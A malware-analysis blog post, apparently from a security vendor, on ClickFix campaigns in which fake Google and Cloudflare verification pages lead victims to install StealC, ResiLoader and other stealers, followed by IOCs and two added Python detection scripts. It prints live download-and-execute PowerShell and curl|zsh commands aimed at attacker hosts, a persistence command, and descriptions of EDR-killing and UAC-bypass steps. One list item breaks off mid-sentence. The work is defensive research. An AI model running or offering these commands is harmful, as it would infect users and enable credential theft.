
Fake Google and Cloudflare verification pages spread multiple malware families

ClickFix attacks, which trick people into running malicious commands themselves, continue to evolve. This latest campaign uses fake Google and Cloudflare verification pages to convince victims to infect their own devices. A single mistake can install malware that steals passwords and other sensitive data, gives attackers remote access to your computer, or downloads additional malware that can take full control of your system.

We uncovered multiple campaigns using the same infrastructure to deliver malware including HijackLoader, StealC, Remus, Amatera Stealer, CastleLoader, NetSupport, and a Rust-based stealer. In one infection chain, a trojanized version of the legitimate Franz messaging app downloads a previously undocumented loader dubbed ResiLoader, which disables security software before deploying the StealC infostealer.

Before we look at the technical details, here’s how to avoid becoming the next victim.

How to stay safe

ClickFix attacks rely on convincing you to run commands yourself. The safest approach is simple:

- Never copy and run commands from a website unless you’re following instructions from a trusted source and understand exactly what the command does.
- Be wary of verification pages. Google, Cloudflare, Microsoft, and other legitimate services will never ask you to paste PowerShell commands into Windows to prove you’re human or fix a problem.
- Don’t let urgency rush you. Fake verification pages often use countdown timers, visitor counters, or warnings to pressure you into acting quickly.
- Keep your security software up to date. Real-time protection and web protection can help block malicious websites before you reach them.
- Question unexpected technical instructions. If a website tells you to open PowerShell, Command Prompt, or Terminal, stop and verify the instructions through the company’s official support channels.
Pro tip: Malwarebytes Browser Guard can warn you when a website attempts to copy content to your clipboard—a common trick used by ClickFix pages.

Technical analysis

The campaigns analysed in this research have been active since at least late 2025 and use a variety of fake Google and Cloudflare pages to deliver malware. Although the lures differ, they share much of the same infrastructure and infection chain, with the attackers continually testing new delivery methods and payloads.

Different lures, one goal

Most of the campaigns share several characteristics:

- Use of the folder C:\ProgramData\Zooms to extract later stages
- PowerShell ClickFix commands that follow similar patterns
- Use of Cloudflare R2 buckets to deliver payloads
- IP addresses hosted by the ASN Dedik Services Limited
- HTML responses containing only the phrase "hehe"

These indicators have changed over time, so they don’t appear in every infection chain. The campaigns continue to evolve, with new payloads and delivery methods regularly introduced. For example, in some cases the IP address is used directly for payload distribution instead of buckets.

The final command copied by the user usually follows this pattern:

powershell -c "iex(irm '{IP}:{Port}/{Random Path}' -UseBasicParsing)"

The port and the path are not always present in the cases analyzed; the ports are random, but some of the ones observed are 6600, 9900, 5506, 7895, 7493, 149, and 8442.

To execute these commands, several ClickFix-related templates are used, mainly related to Google and Cloudflare. We also detected that in some cases the PowerShell command was distributed through the IClickFix framework.

We observed these ClickFix campaigns being distributed through:

- Old websites that have likely expired and been repurchased by the actor(s).
- Cloudflare Pages (.pages.dev domains).
- Compromised websites.
- Fake services, for example related to QR code generation or web file access.
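As an added example (not code from the original post), the following Python flags that command pattern in process-creation command lines. It also decodes long base64 tokens on the command line as UTF-16LE and UTF-8 before matching, on the assumption that base64-wrapped variants of the lure carry the same downloader; the sample command lines are constructed, except the first, which is the Windows command quoted later in the post.

```python
import base64
import re

# ClickFix downloader pattern from the post; port and path are optional and the
# quotes may be straight or curly when pasted from a web page.
CLICKFIX_RE = re.compile(
    r"""iex\s*\(\s*irm\s+['"\u2018\u2019]?(?P<host>[A-Za-z0-9.-]+)(?::(?P<port>\d{1,5}))?"""
    r"""(?P<path>/[A-Za-z0-9_\-./]*)?['"\u2018\u2019]?\s+-UseBasicParsing\s*\)""",
    re.IGNORECASE,
)
# Base64 runs long enough to hold an encoded command (32+ chars is an assumption).
B64_TOKEN_RE = re.compile(r"[A-Za-z0-9+/]{32,}={0,2}")


def _decode_candidates(cmdline):
    """Yield cmdline, then each long base64 token decoded as UTF-16LE and UTF-8."""
    yield cmdline
    for tok in B64_TOKEN_RE.findall(cmdline):
        try:
            raw = base64.b64decode(tok + "=" * (-len(tok) % 4), validate=True)
        except Exception:
            continue
        for enc in ("utf-16-le", "utf-8"):
            try:
                yield raw.decode(enc)
            except UnicodeDecodeError:
                pass


def find_clickfix(cmdline):
    """Return {"host", "port", "path"} when the downloader is found, else None."""
    for text in _decode_candidates(cmdline):
        m = CLICKFIX_RE.search(text)
        if m:
            return {"host": m["host"], "port": m["port"], "path": m["path"]}
    return None


def scan(cmdlines):
    """Return (index, match) for every command line that fires the rule."""
    return [(i, m) for i, c in enumerate(cmdlines) if (m := find_clickfix(c))]


# Constructed sample command lines; only the first is the command quoted in the post.
ENCODED = base64.b64encode(
    "iex(irm '10.0.0.5:9900/zzz' -UseBasicParsing)".encode("utf-16-le")).decode()
SAMPLE_CMDLINES = [
    "powershell -c \"iex(irm '151.240.151.126/rRlmZcaaZfAE3U2BaH' -UseBasicParsing)\"",
    "powershell -c \u201ciex(irm \u201810.0.0.5:6600/abcd\u2019 -UseBasicParsing)\u201d",
    "powershell -nop -w hidden -enc " + ENCODED,
    "powershell -c \"Get-ChildItem C:\\ProgramData\"",
]
```

Feed real Sysmon EventID 1 or Windows 4688 command lines into scan() to hunt for the pattern across a fleet.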
Google ClickFix lures

The actors behind these campaigns use various Google-related HTML pages and kits. One lure impersonates Google reCAPTCHA verification. The pages are hosted on random URLs that display fake or malicious content. These domains are often older registrations that recently began resolving to new IP addresses, suggesting they were repurposed for the campaign.

Some of these pages have URL parameters such as “zoneid”, “cost”, “device”, “country”, and “clickid”, for example:

/conf/captcha.html?zoneid=10420852
/wincapbot/nobot.html
/xmr/trkuste.php?zone=5327134
bless.php?zoneid=10327549&clickid=1091581084925173761&cost=0.000000&country=US&device=desktop

In this case, the functions related to ClickFix are implemented in the class CustomCaptcha. The command is present in the clear without any obfuscation.

Another distribution method uses Cloudflare Pages hosted on .pages.dev subdomains. In this case, the HTML page is obfuscated by declaring several variables and XORing them. The deobfuscated code is called SECURITY GATEWAY and is composed of the functions GatewayRuntime, RemoteVault, BeaconDispatcher, Clipboard, TokenController, and PanelController. The code allows the attackers to retrieve the command either remotely or locally. In this sample, the malicious PowerShell command is stored locally.

We also found that some of these domains have distributed another decoy in the past, in this case associated with an unauthorized Google login. This ClickFix lure asks the user to copy and paste the malicious command to set their device as primary. The interesting part of this ClickFix kit is that it features an “approval gate,” as described in the comments: the attacker must manually choose from the panel which command to have the user execute.

In more recent campaigns, we’ve detected a ClickFix lure related to Google Meet, which requires copying and pasting a malicious command to fix audio issues.
In the analyzed cases, the endpoint /api/driver-clipboard.php returned the following malicious command:

{"mac":"curl -kfsSL $(echo '…'|base64 -D)|zsh","windows":"powershell -c \"iex(irm '151.240.151.126/rRlmZcaaZfAE3U2BaH' -UseBasicParsing)\""}

Other lures

The actors behind this campaign use various kits and lures, mostly related to Google. However, we’ve detected other lures that copied commands related to the same infrastructure. The attackers behind these campaigns also compromise multiple websites using different templates related to the Cloudflare ClickFix lure. We have detected several templates used for Cloudflare pages. In the cases analyzed, the command is present in the clear or, in some cases, obfuscated.

We also detected some specifically created fake service websites. For example, a “My QR Generator” site displays an obfuscated QR code and asks the user to run a PowerShell command to verify that the user is not a robot. In this case the command is encoded in base64.

PowerShell downloader

The ClickFix command executed by the user decodes a script and drops it into the Temp folder with the name tmp{4 char}.tmp.ps1. We have detected several variations of this script, but recent versions do the following:

- Create the folder C:\ProgramData\Zooms.
- Download the next stage from a Cloudflare bucket and save it in C:\ProgramData\Zooms. In some variants of the script, the next stage is downloaded directly from an IP.
- Send the information of the compromised machine to http://{IP}/dl-callback. In some variants of the script, this part is not present.

The campaigns deliver a wide variety of payloads. The table below summarises some of the downloaded filenames and the malware they install. For many of the cases analyzed, the final payload was distributed via DLL hijacking, as we will also see later for the StealC stealer.
| File distributed | Malware distributed |
| --- | --- |
| libEGL.zip, Safe-1.zip | Trojanized Electron app, ResiLoader and StealC |
| Test.msi | Deno Loader and PowerShell Stealer |
| arworks.zip | Amatera Stealer |
| water-night.zip | Remus Stealer |
| Setup.msi, Invintrum_first.msi | NetSupport |
| traffic1.msi | CastleLoader |
| ibrowser.exe | Rust Stealer |

We analyzed a new loader called ResiLoader that ultimately distributes StealC. We also detected that in the latest campaigns the threat actor has started using Deno to distribute a stealer developed in PowerShell as the final stage; the analysis of this infection chain could be the subject of a future blog post.

Trojanized Electron app downloads ResiLoader

In this case, the ZIP was downloaded from:

pub-7080e0c20a0e47ca95a476869c532367.r2[.]dev/libEGL.zip

After extraction to:

C:\ProgramData\Zooms\libEGL.zip_ext

The zip contains a trojanized version of the open-source messaging app called “Franz”. The malicious code is implemented in the index.js file. The downloader performs the following operations:

- Decodes the strings with the function HC().
- Reads readme.txt, expects a campaign key of the form AAAA-BBBB, and returns it as an array of tokens. In this case the name is resiloader-1, which is why we call the downloaded DLL “ResiLoader”.
- Reads %APPDATA%\setup.txt; if absent, generates a random 8-char string and persists it.
- Obtains persistence using app.setLoginItemSettings.
- Sends a POST request to https[:]//completstep[.]com/api/ and processes the JSON response.
- If task.e is present, executes eval(task.e); this allows the attacker to execute arbitrary JavaScript code.
- If task.files is present, creates %TEMP%\<Date.now()>\, decodes and writes each file; if any filename ends in .exe, runs it via child_process.exec.
- If

In our case we received a ZIP that performs the DLL hijacking of ssh-add.exe:

{"task":{"name":"JUNE18USY","files":{ "msys-2.0.dll":"<base64>", "msys-crypto-3.dll":"<base64>", "msys-gcc_s-seh-1.dll":"<base64>", "ssh-add.exe":"<base64>" }}}

Afterwards, the executable was launched with:

C:\WINDOWS\system32\cmd.exe /d /s /c ""C:\Users\{user}\AppData\Local\Temp\1782122017599\ssh-add.exe""

ResiLoader

The msys-crypto-3.dll is an obfuscated .NET NativeAOT loader that implements AV/EDR evasion using a BYOD technique, obtains persistence and ultimately loads the StealC stealer. We didn’t find a specific attribution for this loader, so we called it “ResiLoader” based on the string present in the readme.txt mentioned above.

The loader contains several strings, some in the clear and some encrypted. After decrypting the strings, it’s possible to get a full picture of the functionality of ResiLoader:

MANPO: ReadModule len=...
MANPO: magicOffset=...
…
PERS: FAIL all file copies failed, skipping run key
PERS: FAIL both HKLM and HKCU Run key writes failed
…
RUNPE: CreateProcess failed
RUNPE: PEB patched
RUNPE: VirtualAllocEx failed
…
POST: RunForever exited (unexpected)
POST: entering RunForever
POST: hollow=

The loader performs the following operations:

- Extracts the encoded blob containing two payloads by reading the marker AtLorenBase and the length of the encoded blob. It then decodes the blob and decrypts the driver pcdhost.sys (OPSWAT AppRemover driver) and the StealC payload using a custom decryption algorithm.
- Terminates more than 140 EDR/AV-related processes using the dropped driver.
- Performs a UAC bypass via the ICMLuaUtil elevated COM interface.
- Creates the folder C:\ProgramData\Google Update, copies itself there, and adds persistence using the Run registry key: cmd /c start "" /D "C:\ProgramData\Google Update" ssh-add.exe

In the end, the loader performs process hollowing of the process ServiceModelReg.exe to run the StealC stealer.
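As an added example (not part of the original post), here is a small Python rule set that checks host telemetry for the artifacts described in the downloader and ResiLoader sections: the Zooms staging folder, the tmp{4 char}.tmp.ps1 dropper, the /dl-callback beacon, ssh-add.exe and msys-crypto-3.dll loaded from a Temp\<timestamp>\ directory, and the Google Update Run key. The event dictionaries, rule names and sample events are assumptions constructed for the example, not any product's schema.

```python
import re

# Host artifacts named in the post, as (rule name, event type, field, pattern).
# The event schema is an assumption for this example, not any product's format.
RULES = [
    ("zooms_staging_dir", "file_create", "path",
     re.compile(r"^C:\\ProgramData\\Zooms(\\|$)", re.I)),
    ("clickfix_tmp_ps1", "file_create", "path",
     re.compile(r"\\Temp\\tmp[A-Za-z0-9]{4}\.tmp\.ps1$", re.I)),
    ("dl_callback_beacon", "network", "url",
     re.compile(r"^https?://[^/]+/dl-callback$", re.I)),
    ("ssh_add_from_temp", "process_create", "image",
     re.compile(r"\\Temp\\\d+\\ssh-add\.exe$", re.I)),
    ("msys_crypto_sideload", "image_load", "dll",
     re.compile(r"\\Temp\\\d+\\msys-crypto-3\.dll$", re.I)),
    ("google_update_run_key", "registry_set", "value",
     re.compile(r'cmd /c start "" /D "C:\\ProgramData\\Google Update" ssh-add\.exe', re.I)),
]


def match_event(event):
    """Return the names of every rule the event satisfies."""
    return [name for name, etype, field, rx in RULES
            if event.get("type") == etype and rx.search(event.get(field, ""))]


def triage(events):
    """Map each fired rule name to the events that fired it, in log order."""
    fired = {}
    for ev in events:
        for name in match_event(ev):
            fired.setdefault(name, []).append(ev)
    return fired


# Constructed telemetry for one simulated infection, plus a benign ssh-add.exe start.
SAMPLE_EVENTS = [
    {"type": "file_create", "path": r"C:\Users\bob\AppData\Local\Temp\tmpA1b2.tmp.ps1"},
    {"type": "file_create", "path": r"C:\ProgramData\Zooms\libEGL.zip"},
    {"type": "network", "url": "http://192.0.2.10/dl-callback"},
    {"type": "process_create",
     "image": r"C:\Users\bob\AppData\Local\Temp\1782122017599\ssh-add.exe"},
    {"type": "image_load",
     "dll": r"C:\Users\bob\AppData\Local\Temp\1782122017599\msys-crypto-3.dll"},
    {"type": "registry_set", "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
     "value": 'cmd /c start "" /D "C:\\ProgramData\\Google Update" ssh-add.exe'},
    {"type": "process_create", "image": r"C:\Windows\System32\OpenSSH\ssh-add.exe"},
]
```

Several rules firing on one host in a short window is the signal worth escalating; a lone ssh-add.exe start from its OpenSSH path is normal and is deliberately not matched.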
IOCs

Hashes

72907d0ca3258365838626f6a8d993a6 : ResiLoader DLL
0234E3188F2883A438B3F2BEAB7A78B2 : StealC
6a9ac6b3fff7b695dbd4df6ff7f6c516 : Remus
206ce339febca0c3bcc850f42595fc63 : Amatera Stealer
eee416efcb1e33f220cdb4b05496a07a : NetSupport RAT
b8d53740024d126cb55f83854335a4ab : Rust Stealer

Domains

Distribute ClickFix pages:

Cloudflare buckets used for payload distribution:

unitedstateverif[.]com : payload distribution
bigflaredefence[.]com : payload distribution
popularcard[.]shop : Rust Stealer C2
xzz[.]proxygrid[.]cc : Amatera Stealer C2
completstep[.]com : Loader C2
eventlogerps1[.]ink : Deno Loader
be231ro963[.]com : Deno Loader

IPs

IPs used for payload distribution:

146.19.248[.]120 : StealC C2

Acknowledgements

- Related domain reported: https://x.com/stop_spammerz/status/2070152741037477960
- Related domain reported: https://x.com/Yuki27183/status/2047354005605777850
- User infection reported on Reddit: https://www.reddit.com/r/antivirus/comments/1stn24v/best_thing_to_do_after_getting_malware/
- Possible related infection chain: https://github.com/MessyToilet/csgo-scam-via-powershell-5-31-2026
